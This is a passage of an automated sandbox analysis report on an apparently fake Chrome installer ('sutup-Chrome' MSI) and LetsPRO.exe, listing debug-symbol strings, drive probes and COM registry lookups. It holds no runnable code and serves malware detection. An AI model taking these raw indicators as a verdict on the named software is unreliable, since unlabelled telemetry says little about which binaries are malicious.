                  Source: Binary string: TEST_goopdateres_unsigned_ko.pdb source: GoogleUpdate.exe, 0000001E.00000003.2132719778.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2133014724.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2132719778.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, goopdateres_ko.dll.16.dr
                  Source: Binary string: TEST_goopdateres_unsigned_zh-TW.pdb source: ChromeSetup.exe, 00000010.00000002.3262108532.00000000008BF000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\LetsPRO.exe source: LetsPRO.exe, 00000004.00000003.2287547893.0000000000614000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_ca.pdb source: GoogleUpdate.exe, 0000001E.00000003.2110685243.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2110685243.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2110803785.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: GoogleUpdate_unsigned.pdb source: ChromeSetup.exe, 00000010.00000003.2040369150.0000000002622000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2052523168.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2027981096.0000000002623000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, GoogleUpdate.exe, 0000001E.00000002.3261001713.0000000000121000.00000020.00000001.01000000.00000008.sdmp, GoogleUpdate.exe.30.dr, GoogleUpdate.exe.16.dr
                  Source: Binary string: GoogleUpdateBroker_unsigned.pdb source: GoogleUpdate.exe, 0000001E.00000003.2169446695.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2169122915.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdateBroker.exe.16.dr, GoogleUpdateBroker.exe.30.dr
                  Source: Binary string: C:\Users\ani\code\squirrel\squirrel.windows\build\Release\Win32\StubExecutable.pdb source: LetsPRO.exe, 00000008.00000002.2082649111.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 00000008.00000000.2016836584.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 00000009.00000002.2085508018.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 00000009.00000000.2017338659.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 0000000A.00000002.2085509347.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 0000000A.00000000.2017352894.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 0000000B.00000000.2017959585.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 0000000B.00000002.2081423718.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 0000000C.00000002.2179702546.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 0000000C.00000000.2021432146.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 00000016.00000000.2030073468.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 00000016.00000002.2096564571.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 00000017.00000002.2101128457.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 00000017.00000000.2028409698.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 00000018.00000002.2090627708.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 00000018.00000000.2028772226.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 00000019.00000000.2028783611.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 00000019.00000002.2090626641.000000000026D000.00000002.00000001.01000000.00000004.sdmp
                  Source: Binary string: \user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056h& source: LetsPRO.exe, 00000004.00000003.2233041537.00000000005FD000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: LetsPRO.exe, 00000004.00000003.2287520306.0000000000615000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_pt-PT.pdb source: goopdateres_pt-PT.dll.16.dr
                  Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*.* source: LetsPRO.exe, 00000004.00000003.2287520306.0000000000615000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_am.pdb source: GoogleUpdate.exe, 0000001E.00000003.2107956002.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2107956002.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2108069440.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, goopdateres_am.dll.30.dr
                  Source: Binary string: bols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\LetsPRO.exe source: LetsPRO.exe, 00000004.00000003.2287615622.00000000005E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: GoogleCrashHandler_unsigned.pdbp source: ChromeSetup.exe, 00000010.00000003.2027981096.0000000002623000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105240305.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105347760.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105264031.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, GoogleCrashHandler.exe.30.dr
                  Source: Binary string: TEST_goopdateres_unsigned_cs.pdb source: GoogleUpdate.exe, 0000001E.00000003.2110976317.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2110976317.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2111107544.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, goopdateres_cs.dll.16.dr
                  Source: Binary string: \??\C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.*u source: LetsPRO.exe, 00000004.00000003.2287547893.00000000005EB000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*.*sC source: LetsPRO.exe, 00000004.00000002.3261617800.00000000005AE000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_da.pdb source: GoogleUpdate.exe, 0000001E.00000003.2111298114.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2111298114.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2111407957.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_iw.pdb source: GoogleUpdate.exe, 0000001E.00000003.2127191270.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2127191270.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2127845823.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_ja.pdb source: GoogleUpdate.exe, 0000001E.00000003.2129974854.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2129974854.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2130517355.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_psuser_unsigned_64.pdbF source: GoogleUpdate.exe, 0000001E.00000003.2148667940.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, psuser_64.dll.30.dr, psuser_64.dll.16.dr
                  Source: Binary string: TEST_goopdateres_unsigned_et.pdb source: GoogleUpdate.exe, 0000001E.00000003.2115013262.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114814698.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114814698.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, goopdateres_et.dll.30.dr
                  Source: Binary string: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\338389\LetsPRO.execation Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE source: LetsPRO.exe, 00000004.00000003.2231954101.0000000000624000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{d4876bf7-244b-4c34-87a7-98ddf5c5224d}\*.*ecation Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE source: LetsPRO.exe, 00000004.00000003.2233011919.0000000000628000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\LetsPRO.exern source: LetsPRO.exe, 00000004.00000003.2287615622.00000000005E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: GoogleUpdateComRegisterShell64_unsigned.pdbR source: GoogleUpdate.exe, 0000001E.00000003.2106070949.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2107741736.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ons\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B784 source: LetsPRO.exe, 00000004.00000003.2233041537.00000000005FD000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: GoogleUpdateComRegisterShell64_unsigned.pdb source: GoogleUpdate.exe, 0000001E.00000003.2106070949.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2107741736.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.* source: LetsPRO.exe, 00000004.00000003.2287615622.00000000005E7000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000004.00000003.2287520306.0000000000615000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\ShortcutFlags.pdb source: sutup-Chrome.13.26.x64.msi, MSIB54D.tmp.1.dr
                  Source: Binary string: TEST_goopdateres_unsigned_hr.pdb source: GoogleUpdate.exe, 0000001E.00000003.2118451077.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2118651881.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2118451077.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, goopdateres_hr.dll.16.dr
                  Source: Binary string: TEST_psuser_unsigned_64.pdb source: GoogleUpdate.exe, 0000001E.00000003.2148667940.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, psuser_64.dll.30.dr, psuser_64.dll.16.dr
                  Source: Binary string: \??\C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4 source: LetsPRO.exe, 00000004.00000003.2287615622.00000000005E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_hi.pdb source: GoogleUpdate.exe, 0000001E.00000003.2117894739.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2117894739.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2118068933.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\LetsPRO.exeU source: LetsPRO.exe, 00000004.00000003.2287547893.00000000005EB000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: GoogleUpdateOnDemand_unsigned.pdb source: GoogleUpdate.exe, 0000001E.00000003.2169549013.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2170069383.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2169861546.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdateOnDemand.exe.30.dr, GoogleUpdateOnDemand.exe.16.dr
                  Source: Binary string: 785491~1.LOCntkrnlmp.pdb5x source: LetsPRO.exe, 00000004.00000003.2233041537.00000000005FD000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdate_unsigned.pdb source: GoogleUpdate.exe, 0000001E.00000002.3271726771.000000006CE05000.00000002.00000001.01000000.00000009.sdmp, GoogleUpdate.exe, 0000001E.00000003.2104207516.00000000057C1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5r source: LetsPRO.exe, 00000004.00000003.2287520306.0000000000615000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\aischeduler2.pdb source: sutup-Chrome.13.26.x64.msi, 5bb04c.rbs.1.dr
                  Source: Binary string: TEST_goopdateres_unsigned_ms.pdb source: goopdateres_ms.dll.30.dr
                  Source: Binary string: TEST_goopdateres_unsigned_fr.pdb source: GoogleUpdate.exe, 0000001E.00000003.2116622503.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2116824716.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2116622503.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, goopdateres_fr.dll.30.dr
                  Source: Binary string: msvcr100.i386.pdb source: LetsPRO.exe, LetsPRO.exe, 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, LetsPRO.exe, 0000000D.00000002.2181610240.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, LetsPRO.exe, 0000000E.00000002.2186367127.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, LetsPRO.exe, 0000000F.00000002.2173589064.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, LetsPRO.exe, 00000011.00000002.2191724074.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, LetsPRO.exe, 00000012.00000002.2192475621.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, LetsPRO.exe, 00000013.00000002.2192454597.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, LetsPRO.exe, 0000001A.00000002.2192585742.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, LetsPRO.exe, 0000001B.00000002.2192407874.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, LetsPRO.exe, 0000001C.00000002.2191917426.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, LetsPRO.exe, 0000001D.00000002.2181725589.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, LetsPRO.exe, 0000001F.00000002.2209318696.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp
                  Source: Binary string: GoogleCrashHandler64_unsigned.pdb source: GoogleUpdate.exe, 0000001E.00000003.2105591928.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleCrashHandler64.exe.30.dr
                  Source: Binary string: TEST_goopdateres_unsigned_zh-CN.pdb source: GoogleUpdate.exe, 0000001E.00000002.3269312732.0000000000E60000.00000002.00000001.00040000.0000000D.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_kn.pdb source: GoogleUpdate.exe, 0000001E.00000003.2131480037.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2131988902.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2131480037.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\ShortcutFlags.pdbE source: sutup-Chrome.13.26.x64.msi, MSIB54D.tmp.1.dr
                  Source: Binary string: TEST_goopdateres_unsigned_ml.pdb source: goopdateres_ml.dll.16.dr
                  Source: Binary string: on Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*.* source: LetsPRO.exe, 00000004.00000003.2287547893.00000000005EB000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_fil.pdb source: GoogleUpdate.exe, 0000001E.00000003.2116341966.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2116214832.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2116214832.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_ur.pdb source: goopdateres_ur.dll.30.dr
                  Source: Binary string: load_prod.pdb\*.*5n source: LetsPRO.exe, 00000004.00000003.2287520306.0000000000615000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_sv.pdb source: goopdateres_sv.dll.16.dr
                  Source: Binary string: TEST_goopdateres_unsigned_fi.pdb source: GoogleUpdate.exe, 0000001E.00000003.2115798328.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2115924326.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2115798328.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, goopdateres_fi.dll.16.dr
                  Source: Binary string: GoogleUpdateCore_unsigned.pdbV source: ChromeSetup.exe, 00000010.00000002.3262108532.00000000008C4000.00000004.00000010.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2104991502.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105067095.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2104969687.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdateCore.exe.30.dr, GoogleUpdateCore.exe.16.dr
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\ source: LetsPRO.exe, 00000004.00000003.2233090425.00000000005EB000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_nl.pdb source: goopdateres_nl.dll.16.dr
                  Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: LetsPRO.exe, 00000004.00000003.2287520306.0000000000615000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\LetsPRO.exe source: LetsPRO.exe, 00000004.00000002.3261617800.00000000005AE000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_ro.pdb source: goopdateres_ro.dll.16.dr
                  Source: Binary string: TEST_goopdateres_unsigned_sw.pdb source: goopdateres_sw.dll.16.dr, goopdateres_sw.dll.30.dr
                  Source: Binary string: GoogleCrashHandler64_unsigned.pdbl source: GoogleUpdate.exe, 0000001E.00000003.2105591928.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleCrashHandler64.exe.30.dr
                  Source: Binary string: TEST_goopdateres_unsigned_hu.pdb source: GoogleUpdate.exe, 0000001E.00000003.2119453694.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2119237842.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2119237842.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, goopdateres_hu.dll.30.dr
                  Source: Binary string: TEST_goopdateres_unsigned_ta.pdb source: goopdateres_ta.dll.16.dr
                  Source: Binary string: TEST_psmachine_unsigned.pdbJ source: GoogleUpdate.exe, 0000001E.00000003.2149107681.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, psmachine.dll.16.dr
                  Source: Binary string: pplication Data\Temp\Symbols\ntkrnlmp.pdb\*.*so source: LetsPRO.exe, 00000004.00000003.2287547893.0000000000614000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbl: source: LetsPRO.exe, 00000004.00000003.2233090425.00000000005EB000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_it.pdb source: GoogleUpdate.exe, 0000001E.00000003.2125024951.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2126078995.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2125024951.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, goopdateres_it.dll.16.dr
                  Source: Binary string: TEST_goopdateres_unsigned_en-GB.pdb source: GoogleUpdate.exe, 0000001E.00000003.2112956106.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2112849387.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2112849387.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, goopdateres_en-GB.dll.30.dr
                  Source: Binary string: TEST_goopdateres_unsigned_sk.pdb source: goopdateres_sk.dll.16.dr, goopdateres_sk.dll.30.dr
                  Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*.*a+ source: LetsPRO.exe, 00000004.00000002.3261617800.0000000000614000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: LetsPRO.exe, 00000004.00000003.2287520306.0000000000615000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_te.pdb source: goopdateres_te.dll.16.dr
                  Source: Binary string: TEST_goopdateres_unsigned_id.pdb source: GoogleUpdate.exe, 0000001E.00000003.2120248685.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2119985698.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2119985698.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\LetsPRO.exe source: LetsPRO.exe, 00000004.00000002.3261617800.00000000005AE000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\LetsPRO.exe4 source: LetsPRO.exe, 00000004.00000003.2233041537.0000000000614000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\*.*F source: LetsPRO.exe, 00000004.00000003.2233011919.0000000000628000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: LetsPRO.exe, 00000004.00000003.2233090425.00000000005EB000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_vi.pdb source: goopdateres_vi.dll.30.dr
                  Source: Binary string: \??\C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\LetsPRO.exenage source: LetsPRO.exe, 00000004.00000003.2287615622.00000000005E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_es.pdb source: GoogleUpdate.exe, 0000001E.00000003.2113768779.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2113540436.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2113540436.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, goopdateres_es.dll.30.dr, goopdateres_es.dll.16.dr
                  Source: C:\Windows\System32\msiexec.exe File opened: z:
                  Source: C:\Windows\System32\msiexec.exe File opened: x:
                  Source: C:\Windows\System32\msiexec.exe File opened: v:
                  Source: C:\Windows\System32\msiexec.exe File opened: t:
                  Source: C:\Windows\System32\msiexec.exe File opened: r:
                  Source: C:\Windows\System32\msiexec.exe File opened: p:
                  Source: C:\Windows\System32\msiexec.exe File opened: n:
                  Source: C:\Windows\System32\msiexec.exe File opened: l:
                  Source: C:\Windows\System32\msiexec.exe File opened: j:
                  Source: C:\Windows\System32\msiexec.exe File opened: h:
                  Source: C:\Windows\System32\msiexec.exe File opened: f:
                  Source: C:\Windows\System32\msiexec.exe File opened: b:
                  Source: C:\Windows\System32\msiexec.exe File opened: y:
                  Source: C:\Windows\System32\msiexec.exe File opened: w:
                  Source: C:\Windows\System32\msiexec.exe File opened: u:
                  Source: C:\Windows\System32\msiexec.exe File opened: s:
                  Source: C:\Windows\System32\msiexec.exe File opened: q:
                  Source: C:\Windows\System32\msiexec.exe File opened: o:
                  Source: C:\Windows\System32\msiexec.exe File opened: m:
                  Source: C:\Windows\System32\msiexec.exe File opened: k:
                  Source: C:\Windows\System32\msiexec.exe File opened: i:
                  Source: C:\Windows\System32\msiexec.exe File opened: g:
                  Source: C:\Windows\System32\msiexec.exe File opened: e:
                  Source: C:\Windows\System32\netsh.exe File opened: c:
                  Source: C:\Windows\System32\msiexec.exe File opened: a:
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
                  Source: C:\Windows\System32\cscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                  Source: C:\Windows\System32\cscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                  Source: C:\Windows\System32\cscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                  Source: C:\Windows\System32\cscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                  Source: C:\Windows\System32\cscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
